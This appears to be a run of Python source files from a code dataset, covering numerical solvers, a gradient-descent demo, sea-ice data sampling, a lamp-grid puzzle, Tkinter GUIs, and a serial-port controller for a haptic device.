k3=dt*F(Time[-1]+dt/2,w[:,:,-1:]+k2/2)\r\n \r\n k4=dt*F(Time[-1]+dt,w[:,:,-1:]+k3)\r\n \r\n ans=w[:,:,-1:]+1/6*(k1+2*k2+2*k3+k4)\r\n \r\n return(ans)\r\n ","sub_path":"NumericalSolvers.py","file_name":"NumericalSolvers.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593792385","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n#Create data\nx=np.array([0.,0.5,1.])\ny_exact=np.array([0.,1.,1.])\n\n#Intiliase W and b\nW=0.5\nb=0.5\n\n#Set other constants\nN=3\neta=0.01\nMaxIter=16\n\n#Initialise approximation\nF=W * x + b\n\n#Functions\ndef cost():\n return (1/N) * np.sum( 0.5* (y_exact - F)**2 )\n#Partial derivates of cost\ndef cost_W(k):\n return (1/N) * np.sum( x[k]*(W*x[k]- y_exact[k] +b) )\ndef cost_b(k):\n return (1/N) * np.sum( W*x[k] - y_exact[k] + b )\n\n#Cost_vec\ncost_vec=np.empty(MaxIter)\nj=np.arange(0,MaxIter,1)\nw_vec=np.empty(MaxIter)\nb_vec=np.empty(MaxIter)\n\n#Peform stochastic gradient descent\nfor i in range(0,MaxIter):\n #Pick random index\n k=random.randint(0, (N-1))\n w_vec[i]=W\n b_vec[i]=b\n #Forward pass\n F=W*x+b\n #Alter weights and biases\n W= W - eta * cost_W(k)\n b= b - eta * cost_b(k)\n #Calculate newcost\n newcost=cost()\n cost_vec[i]=newcost\n\n #print(newcost)\n\nplt.plot(j,cost_vec)\nplt.title(f'Cost Eta={eta} MaxIter={MaxIter}')\nplt.xlabel('Iteration')\nplt.ylabel('Cost for SGD')\nplt.show()\n\nfor i in range(0,MaxIter):\n print(f'{w_vec[i]} & {b_vec[i]} & {cost_vec[i]}')","sub_path":"CAMCW2/Q4d.py","file_name":"Q4d.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315922431","text":"# sample point\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot as plt\nimport geopandas as gpd\nfrom shapely.geometry import Point\nimport ast, rasterio\nfrom affine import Affine\nimport xarray as xr\nimport numpy as np\nimport datetime\nimport seaborn as sns\n\nx,y = (-1915085, 937121)\npt = 
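`RK()` above applies the classic fourth-order Runge-Kutta update to a stacked state matrix; the same update for a scalar ODE, checked against the exact solution of w' = -w:

```python
import math

# Scalar RK4 step for w' = f(t, w), matching the update in RK()'s docstring.
def rk4_step(f, t, w, dt):
    k1 = dt * f(t, w)
    k2 = dt * f(t + dt / 2, w + k1 / 2)
    k3 = dt * f(t + dt / 2, w + k2 / 2)
    k4 = dt * f(t + dt, w + k3)
    return w + (k1 + 2 * k2 + 2 * k3 + k4) / 6

t, w, dt = 0.0, 1.0, 0.1
for _ in range(10):                     # integrate w' = -w from t=0 to t=1
    w = rk4_step(lambda t, w: -w, t, w, dt)
    t += dt
assert abs(w - math.exp(-1.0)) < 1e-6   # exact solution is exp(-t)
```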
Point(x,y)\n\ngdf = gpd.GeoDataFrame( {'id':[1],'geometry':[pt]}, crs={'init':'epsg:3411'}, geometry='geometry' )\ngdf.to_file( '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/test_point_ak.shp' )\nnetcdf_fn = '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/NetCDF/nsidc_0051_sic_nasateam_1978-2017_Alaska.nc'\nds = xr.open_dataset( netcdf_fn )\n\na = Affine(*ast.literal_eval(ds.affine_transform)[:6])\ncol, row = ~a * (x, y)\nrow, col = np.array([row,col]).astype(int)\n\n# rst = rasterio.open('/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/GTiff/alaska/1978/nt_19781026_n07_v1-1_n.tif')\n# arr = rst.read(1)\n# arr[row,col] #<- select a single profile for testing\n\nprofile = ds.sic[:,row,col]\np2 = profile.resample( time='M' ).mean( 'time' )\nyears = [str(i) for i in range(1979,2017)]\nd = dict()\nfor year in years:\n\tp = p2.sel( time=year )\n\td[year] = p.data\n\tp.plot()\n\tplt.savefig('/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/tmp/test_year_profile_monthly_{}.png'.format(year))\n\tplt.close()\n\n\nmonths = [datetime.date(2000, m, 1).strftime('%B')[:3] for m in range(1, 13)]\ndf = pd.DataFrame( d ).T\ndf.columns = months\n\nsns.heatmap( df, cmap='Blues_r' )\nplt.savefig( '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/tmp/heatmap_profile_monthly.png' )\nplt.close()\n\n\n","sub_path":"other_code/select_profile_using_xy.py","file_name":"select_profile_using_xy.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"174705435","text":"\r\n\r\ndef display(mat, grid_height, grid_width):\r\n for i in range(0, grid_height):\r\n print(mat[i])\r\n\r\n\r\ndef count_on(mat, grid_height, grid_width):\r\n c = 0\r\n for i in range(0, grid_height):\r\n for j in range(0, grid_width):\r\n if mat[i][j] == 1:\r\n c += 1\r\n return c\r\n\r\n\r\ndef is_valid(x, y, grid_width, grid_height):\r\n return (0 <= x < grid_width) and (0 <= y < grid_height)\r\n\r\n\r\ndef switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x, y):\r\n if mat[y][x] == 0:\r\n return\r\n else:\r\n print(\"Switching off ({0}, {1})\".format(x, y))\r\n mat[y][x] = 0\r\n\r\n x1 = x + conn_x1\r\n y1 = y + conn_y1\r\n x2 = x + conn_x2\r\n y2 = y + conn_y2\r\n if is_valid(x1, y1, grid_width, grid_height):\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x1, y1)\r\n if is_valid(x2, y2, grid_width, grid_height):\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x2, y2)\r\n\r\n\r\ndef num_illuminated(grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, start_x, start_y):\r\n \"\"\"\r\n grid_width - the width of the room grid\r\n grid_height - the height of the room grid\r\n conn_x1 - the x-coordinate of the first lamp connection\r\n conn_y1 - the y-coordinate of the first lamp connection\r\n conn_x2 - the x-coordinate of the second lamp connection\r\n conn_y2 - the y-coordinate of the second lamp connection\r\n start_x - the x-coordinate of the first lamp turned off\r\n start_y - the y-coordinate of the first lamp turned off\r\n \"\"\"\r\n mat = []\r\n for i in range(0, grid_height):\r\n mat.append([])\r\n for j in range(0, grid_width):\r\n mat[i].append(1)\r\n display(mat, grid_height, grid_width)\r\n if is_valid(start_x, start_y, grid_width, grid_height):\r\n # new_mat = switch_off(mat, grid_width, grid_height, conn_x1, 
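The point sampling above inverts the grid's affine transform to turn projected x/y coordinates into a row/column index. A standalone sketch with a hypothetical 25 km polar grid; in the script the six real coefficients come from `ast.literal_eval(ds.affine_transform)`:

```python
from affine import Affine

# Hypothetical 25 km north-polar grid (coefficients illustrative only).
fwd = Affine(25000, 0, -3850000,
             0, -25000, 5850000)

x, y = -1915085, 937121        # projected coordinates in metres
col, row = ~fwd * (x, y)       # invert the transform: map x/y -> pixel col/row
row, col = int(row), int(col)
```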
conn_y1, conn_x2, conn_y2, start_x, start_y)\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, start_x, start_y)\r\n\r\n return count_on(mat, grid_height, grid_width)\r\n # return count_on(new_mat, grid_height, grid_width)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(num_illuminated(5, 3, 0, 0, 0, 0, 4, 2))\r\n # print(num_illuminated(5, 3, -1, 0, -1, -1, 4, 2))\r\n # print(num_illuminated(1, 1, -1, -1, -1, -1, 2, 2))\r\n\r\n","sub_path":"hackerrank/akuna/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138683100","text":"from pathlib import Path\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox\nfrom tkinter.ttk import Style\nfrom functools import partial\nfrom CustomNotebook import CustomNotebook\nfrom interface_affichage import *\nfrom kernel import *\n\n\nclass App(Frame):\n def __init__(self, master=None):\n combostyle = Style()\n combostyle.theme_create('combostyle', parent='alt',\n settings={'TCombobox':\n {'configure':\n {'selectbackground': 'white',\n 'fieldbackground': 'white',\n 'lightcolor': 'black',\n 'selectforeground': 'black',\n 'bordercolor': 'white',\n }}}\n )\n # ATTENTION: this applies the new style 'combostyle' to all tCombobox\n combostyle.theme_use('combostyle')\n Frame.__init__(self, master)\n Grid.rowconfigure(self, 0, weight=1)\n Grid.columnconfigure(self, 0, weight=1)\n self.files = {}\n self.notebook_frames = {}\n self.lastworkarea = 0\n self.top = None\n self.master.title(\"Blablacar\")\n self.master.geometry(\"1000x700\")\n menu = Menu(self)\n self.master.config(menu=menu)\n fichier_menu = Menu(menu, tearoff=\"false\")\n menu.add_cascade(label=\"Fichier\", menu=fichier_menu, )\n importer = Menu(fichier_menu, tearoff=\"false\")\n importer.add_command(label=\"Fichier TSP\", command=self.open_file_instance)\n # fichier_menu.add_command(label=\"Importer\",command=None)\n fichier_menu.add_cascade(label=\"Importer\", menu=importer, )\n fichier_menu.add_command(label=\"Exit\", command=self.master.quit)\n\n workarea_menu = Menu(menu, tearoff=\"false\")\n menu.add_cascade(label=\"workarea\", menu=workarea_menu)\n workarea_add = Menu(workarea_menu, tearoff=\"false\")\n self.workarea_add_menu = workarea_add\n workarea_menu.add_cascade(label=\"Add workarea\", menu=workarea_add)\n self.notebook = CustomNotebook(self.master)\n self.notebook.pack(side=\"top\", fill=\"both\", expand=True)\n\n def workarea_add_file(self, menu, file_path):\n # for file_path in self.files.keys():\n # menu.insert_command(label=file_path,command=partial(self.workarea_add,file_path))\n menu.add_command(label=file_path, command=partial(self.workarea_add, file_path))\n\n def workarea_add(self, file_path):\n\n frame = Work_area_Window(self.notebook,file=self.files[file_path])\n self.lastworkarea = self.lastworkarea + 1\n self.notebook_frames[\"Work Area \" + str(self.lastworkarea)] = frame\n self.notebook.add(frame, text=\"Work Area \" + str(self.lastworkarea))\n self.notebook.select(frame)\n None\n\n def open_file_instance(self):\n file_path = filedialog.askopenfilename(title=\"Selectioner un Fichier\")\n print(file_path)\n self.files[file_path]=File(file_path)\n self.workarea_add_file(self.workarea_add_menu, file_path)\n self.workarea_add(file_path)\n\n\n\ndef main():\n root = Tk()\n Grid.rowconfigure(root, 0, weight=1)\n Grid.columnconfigure(root, 0, weight=1)\n app = App(master=root)\n app.pack()\n root.mainloop()\n\n\nif 
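`switch_off()` above recurses once per lamp, so a long chain can exceed Python's default recursion limit (about 1000 frames); an explicit stack gives the same propagation without that risk:

```python
# Iterative version of switch_off(): same propagation rule, but an explicit
# stack sidesteps Python's recursion limit on long lamp chains.
def switch_off_iter(mat, grid_width, grid_height, cx1, cy1, cx2, cy2, x, y):
    stack = [(x, y)]
    while stack:
        x, y = stack.pop()
        if not (0 <= x < grid_width and 0 <= y < grid_height):
            continue
        if mat[y][x] == 0:          # already off -- stop propagating
            continue
        mat[y][x] = 0
        stack.append((x + cx1, y + cy1))
        stack.append((x + cx2, y + cy2))
```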
__name__ == '__main__':\n main()\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"207256658","text":"#!/usr/bin/python3\n# coding=utf-8\n\"\"\"\ncreated by MrWang_tju 2018.12.06\nfor control the haptic device\nV1.0.0\n\n2019.2.25\n增加 forcesw函数--》选择是否使能某类型力补偿\n2019.4.13\n0.解决同时使用多个串口时,其他设备占用串口导致得COM编号读取失败 修改为不打开串口,直接查看COM编号的方式\n\n\n\"\"\"\n\nimport serial\n\nimport serial.tools.list_ports\nimport time\n\nimport serial.tools.list_ports as ports\n\n\ndef open_ser(baudrate = 115200,time = 0.01):\n global uart\n port_list = list(serial.tools.list_ports.comports())\n # print([comport.device for comport in serial.tools.list_ports.comports()])\n port_list_name = [comport.device for comport in ports.comports()]\n print(port_list_name)\n # print(port_list)\n # ListPortInfo\n if len(port_list) <= 0:\n print (\"The Serial port can not be found\")\n else:\n print(\"%d serial can be found!\"%(len(port_list)))\n print(\"Please input the serial sort:\")\n num = int(input())\n port_list_0 = list(port_list[num])\n port_serial = port_list_0[0]\n uart = serial.Serial(port_serial, baudrate, timeout=time)\n if uart.isOpen() is True:\n print(uart.name,\"is Opened '%d'\"%(uart.baudrate))\n\n\n\n\"\"\"\nfunction:\n 串口写数据\nArgs:\n data[]\n \nReturn:\n None\n\n\"\"\"\n\n\ndef write_data(data=[]):\n if len(data) == 11:\n data[9] = 0\n sum = 0\n for i in range(8):\n sum =sum + data[i + 1]\n data[9] = sum % 100\n # print(data)\n uart.write(data)\n\n else:\n uart.write(data)\n\n\ndef read_data(num=15):\n # i = 10 # 经过测试,发现正常接收16位耗时大概为500,这里设置1000用来保证数据接收完成\n # byte_list = []\n # byte = 0\n # n_s = True\n byte_list = uart.readall() #timeout 来控制读取时间\n\n '''\n if uart.any() > 0 and n_s:\n if list(uart.read(1))[0] == 123:\n n_s = False\n byte_list.append(123)\n time.sleep(0.01)\n while uart.any() > 0:\n byte_list.append(uart.readchar())\n '''\n return byte_list\n # if len(byte_list) == num:\n # return byte_list\n # else:\n # print(\"接收的数据有误:\")\n # print(byte_list)\n # return []\n\n\n\"\"\"\nfunction:\n 使能或失能驱动板\nArgs:\n state == 1 使能\n == 0 失能\n \nReturn:\n None\n\n\"\"\"\ndef board_enable(state = 1):\n data = [0,0,0,0,0,0,0,0,0,0,0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x10\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\n\"\"\"\nfunction:\n 使能或失能驱动芯片\nArgs:\n state == 1 使能\n == 0 失能\n\nReturn:\n None\n\n\"\"\"\n\n\ndef motor_enable(state=1):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x10\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\"\"\"\nfunction:\n 电机PWM设置\nArgs:\n id: 电机编号\n PwmCValue:电机pwm值 0-1000\n \nReturn:\n None\n\n\"\"\"\n\ndef set_pwmall(PwmValue1 = 500,PwmValue2 = 500,PwmValue3 = 500):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x20\n data[3] = PwmValue1//100\n data[4] = PwmValue1%100\n data[5] = PwmValue2//100\n data[6] = PwmValue2%100\n data[7] = PwmValue3//100\n data[8] = PwmValue3%100\n data[10] = 0x7D\n write_data(data)\n\ndef set_pwm(id = 1, PwmValue1 = 500):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x20\n data[3] = PwmValue1//100\n data[4] = PwmValue1%100\n data[5] = 0\n data[6] = 0\n data[7] = 0\n data[8] = 0\n data[10] = 0x7D\n write_data(data)\n\ndef set_mode(mode = 500):\n \"\"\"\n 设置模式\n 
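`open_ser()` above enumerates ports with `serial.tools.list_ports.comports()` before opening one, which is the 2019.4.13 fix noted in the header. A minimal sketch of that pattern; picking index 0 here is illustrative, where the script asks the user instead:

```python
import serial
import serial.tools.list_ports

# List COM ports without opening them, then open the chosen one.
names = [p.device for p in serial.tools.list_ports.comports()]
print(names)
uart = serial.Serial(names[0], 115200, timeout=0.01)
print(uart.name, "opened at", uart.baudrate)
```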
#define\t\tCTL_FREE\t\t0x10\t//free Mode\n #define\t\tCTL_ENABLE\t\t0x11\t//board enable\n #define \tCTL_PUSHPULL\t0x12\t//\n\n :param mode:\n :return:\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0\n data[2] = 0x40\n data[3] = mode\n data[4] = 0\n data[5] = 0\n data[6] = 0\n data[7] = 0\n data[8] = 0\n data[10] = 0x7D\n write_data(data)\n\n\n\ndef get_encoder(id=1):\n \"\"\"\n function:\n 编码器数据回读\n Args:\n id: 无意义\n 编码器读数\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x30\n data[3] = 0x20\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n\n # print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n M1EnCounter = UartDataConver(byte_list[2],byte_list[3],byte_list[4])\n M2EnCounter = UartDataConver(byte_list[5],byte_list[6],byte_list[7])\n M3EnCounter = UartDataConver(byte_list[8],byte_list[9],byte_list[10])\n print (\"Encoder M1 \", M1EnCounter, \" M2 \", M2EnCounter, \" M3 \", M3EnCounter)\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\n\ndef get_pwm(id=1):\n \"\"\"\n function:\n 编码器数据回读\n Args:\n id: 无意义\n PwmCValue:电机pwm值 0-1000\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x31\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n\n # print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n M1PWM = UartDataConver(byte_list[2],byte_list[3],byte_list[4])\n M2PWM = UartDataConver(byte_list[5],byte_list[6],byte_list[7])\n M3PWM = UartDataConver(byte_list[8],byte_list[9],byte_list[10])\n print (\"PWM M1: \",M1PWM,\" M2 : \",M2PWM,\" M3 : \",M3PWM)\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\ndef get_pwm_times(tim = 0.2):\n while 1:\n get_pwm(0)\n time.sleep(tim)\n\n\n\"\"\"\nfunction:\n 选择不同种类的力是否使能\nArgs:\n state == 1 使能\n == 0 失能\n \n#define\t\tCMD_ForceSwitch\t\t0x41\t//不同种类力补偿类型\n#define\t\tCTL_StaFreFlag\t\t0x11\n#define\t\tCTL_DynFreFlag\t\t0x12\n#define\t\tCTL_GraFlag\t\t\t0x13\n#define\t\tCTL_InerFlag\t\t0x14\n\nReturn:\n None\n\n\"\"\"\n\n\ndef force_sw(num = 0,state=1):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x41\n if(num==0):\n print(\"num = 1-4 对应 1.静摩擦 2.滑动摩擦 3.重力 4.惯性力\")\n else:\n if num == 1:\n data[3] = 0x11\n elif num == 2:\n data[3] = 0x12\n elif num == 3:\n data[3] = 0x13\n elif num == 4:\n data[3] = 0x14\n data[4] = state\n data[10] = 0x7D\n write_data(data)\n\ndef write_flash(num = 1,value = 0):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x11\n data[4] = num\n\n data[5] = int(value/256)\n data[6] = value%256\n data[10] = 0x7D\n write_data(data)\n\n\"\"\"\n输出flash表内容\n\n\"\"\"\ndef flash():\n print(\"力反馈设备 固定参数FLASH表\"\n \"0,\t//1.产品型号\\n\"\n \"0,\t//2.软件版本\t\t\t\t\t\t\t\t\t\t\t2\\n\"\n \"0,\t//3.机械结构版本\t\t\t\t\t\t\t\t\t\t3\\n\"\n \"0,\t//4.电路硬件版本\t\t\t\t\t\t\t\t\t\t4\\n\"\n \"500, //5.PWMMID-ui 
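The commands above all share the 11-byte frame that `write_data()` finalises: `0x7B` header, device id, command byte, six payload bytes, `sum(bytes 1..8) % 100` as checksum at index 9, and a `0x7D` trailer. A small builder for that frame; the example payload mirrors `set_pwm`:

```python
# Build the 11-byte frame write_data() finalises.
def make_frame(dev_id, cmd, payload6):
    assert len(payload6) == 6
    data = [0x7B, dev_id, cmd, *payload6, 0, 0x7D]
    data[9] = sum(data[1:9]) % 100      # checksum over id, cmd and payload
    return data

pwm = 500                               # mirrors set_pwm(id=1, PwmValue1=500)
frame = make_frame(1, 0x20, [pwm // 100, pwm % 100, 0, 0, 0, 0])
# uart.write(bytes(frame))
```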
\t电机零扭力参考PWM值\t\t\t\t5\\n\"\n \"15,\t//6.PULL_PWM-ui\t电机同向推拉时 增加的pwm值\t\t\t6\\n\"\n \"54,\t//7.SigPWMPulse-ui 检测到转动后 单电机摩擦力补偿\t7\\n\"\n \"30,\t//8.StopPwm-ui\t检测到静止时 正反向的摩擦力波动\t8\\n\"\n \"88,\t//9.PLPH_Para_k-f\t推拉随速度变化力补偿值 一次函数 k值\t9\\n\"\n \"4,\t//10.PLPH_Para_b-i\t\t\t\t\t\t\t\t\t\t10\\n\"\n \"//return (float)(0.PLPH_Para_k*sp+PLPH_Para_b); 返回本项计算PWM值\\n\"\n \"6,\t//11.重力补偿参数 \\n\"\n \"100,\t//12.InertiaPara-f 惯性力计算 与加速度相乘的系数 \\n\"\n )\n\ndef read_flash(num = 1):\n \"\"\"\n function:\n FLASH表数据回读\n Args:\n num: FLASH 顺序\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x10\n data[4] = num\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n # if num>0 and num<=6:\n # part = 1\n # elif num>6 and num<=12:\n # part = 2\n # elif num>12 and num<=18:\n # part = 3\n # elif num>18 and num<=24:\n # part = 4\n print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n if type == 0x30:\n Value = data[((num-1)%6)*2+2] *256 +data[((num-1)%6)*2+3]\n print (\"FLASH表 \",num,\" 对应的值为\",Value)\n else:\n print (\"返回数据非FLASH表\")\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\ndef flash_init():\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x13\n data[10] = 0x7D\n write_data(data)\n\ndef UartDataConver(num1=0, num2=0, num3=0):\n if(num1//128==1) is True:\n num1 = (num1 %128)\n data = -(num1*65536 + num2*256 + num3)\n else:\n data = num1*65536 + num2*256 + num3\n\n return data\n\n\ndef debug(state=1):\n \"\"\"\n function:\n 打开或关闭调试模式\n Args:\n state == 1 使能\n == 0 失能\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x80\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Others/haptic.py","file_name":"haptic.py","file_ext":"py","file_size_in_byte":10998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"257542933","text":"from tkinter import*\nfrom math import*\nfrom tkinter.filedialog import askopenfilename\n\nclass Vektorji():\n def __init__(self, master):\n\n#=================================================================#\n# oznake\n#\n# ni enakega stevila komponent = \"komponente\" \n# nicelni vektor = \"nicelni\"\n#\n# stanje = 0 zaprt prikaz\n# stanje = 1 odprt prikaz\n#\n# ostala stanja enako, samo drugo ime(ostevilcenje)\n#\n# stanje_1 = 0 nisi preveril\n# stanje_1 = 1 so pravokotni\n# stanje_1 = 2 nimajo enakega stevila komponent\n#\n#=================================================================#\n\n#stanja\n\n self.stanje_0 = 0 # stanje izbrane datoteke (0, 1)\n self.stanje_1 = 0 # stanje pravokotnosti (0, 1, 2)\n self.stanje_2 = 0 # izpis help (0, 1)\n self.stanje_3 = 0 # izpis vektorji (0, 1)\n self.stanje_4 = 0 # stanje normirani (0, 1)\n self.stanje_5 = 0 # izpis ortonormirani (0, 1)\n\n#pojavitvena besedila\n \n self.warn = StringVar(master, value = None)\n self.check = StringVar(master, value = None)\n self.norm = StringVar(master, value = None)\n self.save = StringVar(master, value=None)\n self.help = StringVar(master, 
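`UartDataConver()` above decodes each three-byte counter as sign-magnitude, where bit 7 of the high byte carries the sign and the remaining 23 bits the magnitude, not as two's complement. A compact equivalent with a couple of spot checks:

```python
# Sign-magnitude decode of a 3-byte counter, mirroring UartDataConver().
def decode24(hi, mid, lo):
    mag = (hi & 0x7F) * 65536 + mid * 256 + lo
    return -mag if hi & 0x80 else mag

assert decode24(0x00, 0x01, 0x00) == 256
assert decode24(0x80, 0x01, 0x00) == -256
```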
value = None)\n self.vect1 = StringVar(master, value = None)\n self.vect2 = StringVar(master, value = None)\n self.dat = StringVar(master, value = None)\n self.warning = StringVar(master, value = None)\n \n\n#besedila, polja\n\n besedilo_1 = Label(textvariable = self.warning)\n besedilo_1.grid(row = 3, column = 3)\n\n besedilo_2 = Label(master, text = \"Preverite, če seznam vektorjev tvori ortogonalen sistem\", width = 45, anchor = W)\n besedilo_2.grid(row = 1, column = 0)\n\n besedilo_3 = Label(master, text = \"Tvorite ortonormirano bazo prostora\", width = 45, anchor = W)\n besedilo_3.grid(row = 2, column = 0) \n\n besedilo_4 = Label(master, text=\"Seznam baznih vektorjev prostora shranite v datoteko\", width = 45, anchor = W)\n besedilo_4.grid(row = 3, column = 0)\n\n besedilo_5 = Label(textvariable = self.warn)\n besedilo_5.grid(row = 0, column = 2)\n \n besedilo_6 = Label(textvariable = self.vect1)\n besedilo_6.grid(row = 4, column = 0, columnspan = 2)\n\n besedilo_7 = Label(text = \"Izberite datoteko\", width = 45, anchor = W)\n besedilo_7.grid(row = 0, column = 0)\n\n besedilo_8 = Label(textvariable = self.check, width = 40)\n besedilo_8.grid(row = 1, column = 2)\n\n besedilo_9 = Label(textvariable = self.norm, width = 40)\n besedilo_9.grid(row = 2, column = 2)\n\n besedilo_10 = Label(textvariable =self.save, width = 40)\n besedilo_10.grid(row = 3, column = 2)\n\n besedilo_11 = Label(textvariable = self.vect2)\n besedilo_11.grid(row = 4, column = 2, columnspan = 2)\n\n#gumbi\n\n gumb_preveri = Button(master, text = \"Preveri\", command = self.preveri, width = 12)\n gumb_preveri.grid(row = 1, column = 1)\n\n gumb_normiraj = Button(master, text = \"Normiraj\", command = self.normiraj, width = 12)\n gumb_normiraj.grid(row = 2, column = 1)\n\n gumb_shrani = Button(master, text = \"Shrani\", command = self.shrani, width = 12)\n gumb_shrani.grid(row = 3, column = 1)\n\n gumb_pomoc = Button(master, text=\"Pomoč\", command = self.pomoc, width = 20)\n gumb_pomoc.grid(row = 0, column = 3)\n\n gumb_izpis = Button(master, text = \"Izpis vektorjev\", command = self.izpis, width = 20)\n gumb_izpis.grid(row = 1, column = 3)\n\n gumb_normirani = Button(master, text = \"Izpis ortonormirane baze\", command = self.normirani, width = 20)\n gumb_normirani.grid(row = 2, column = 3)\n\n gumb_odpri = Button(master, text = \"Odpri\", command = self.odpri, width = 12)\n gumb_odpri.grid(row = 0, column = 1)\n\n#metode \n\n def preveri(self):\n if self.stanje_0 == 1:\n if self.stanje_1 == 0:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n if pravokotni(seznam):\n self.check.set(\"Vektorji so pravokotni\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 1 \n if pravokotni(seznam) == False or pravokotni(seznam) == \"nicla\":\n self.check.set(\"Vektorji niso pravokotni\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 2\n if pravokotni(seznam) == \"komponente\":\n self.check.set(\"Vektorji nimajo enakega števila komponent\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 2 \n elif self.stanje_1 == 1:\n pass\n elif 
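`preveri()` above parses the file format `[[x1,x2,...];[y1,y2,...]]` by stripping brackets and splitting on `;` and `,`. The same parsing as a standalone helper:

```python
# Parse "[[x1,x2,...];[y1,y2,...]]" into a list of float vectors,
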